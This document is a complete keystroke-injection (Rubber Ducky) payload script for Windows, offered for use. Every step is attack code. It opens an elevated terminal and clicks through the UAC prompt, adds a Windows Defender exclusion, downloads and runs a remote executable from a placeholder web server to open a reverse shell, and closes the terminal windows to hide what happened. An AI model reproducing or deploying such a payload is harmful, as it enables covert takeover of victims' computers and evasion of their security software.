REM       |=========================================================================|
REM         Staged Interpreter TCP Reverse Ducky Shell
REM         Author: DVBNL
REM         Version 2.2
REM         OS Tested: Windows 11, Windows 10
REM         INTERPRETER STAGED REVERSE SHELL > executable
REM         WORKS WITH NEWEST WINDOWS TERMINAL (wt.exe)
REM       |=========================================================================|

ATTACKMODE HID

REM |===Start Windows Terminal as admin===|
DELAY 2000
GUI r
DELAY 250
STRING powershell "start-process wt -verb runas" 
ENTER
DELAY 2500
LEFT
ENTER
DELAY 1000

REM |===Powershell Block to create variables and add exclusions to Windows Defender===|
STRING $dir = "C:\temp";
ENTER
STRING $shell = "$dir\shell.exe"; New-Item -Path $dir -ItemType Directory;
ENTER
STRING Add-MpPreference -ExclusionPath $dir;
ENTER
DELAY 250

REM |===Download shell executable from Webserver and RUN!===|
STRING Invoke-WebRequest -Uri http://yourwebserver/payload.exe -OutFile $shell; Start-Process $shell;
ENTER

REM |===Kill all active wt or powershell processes (Visibility)===|
STRING Stop-Process -Name powershell, WindowsTerminal
ENTER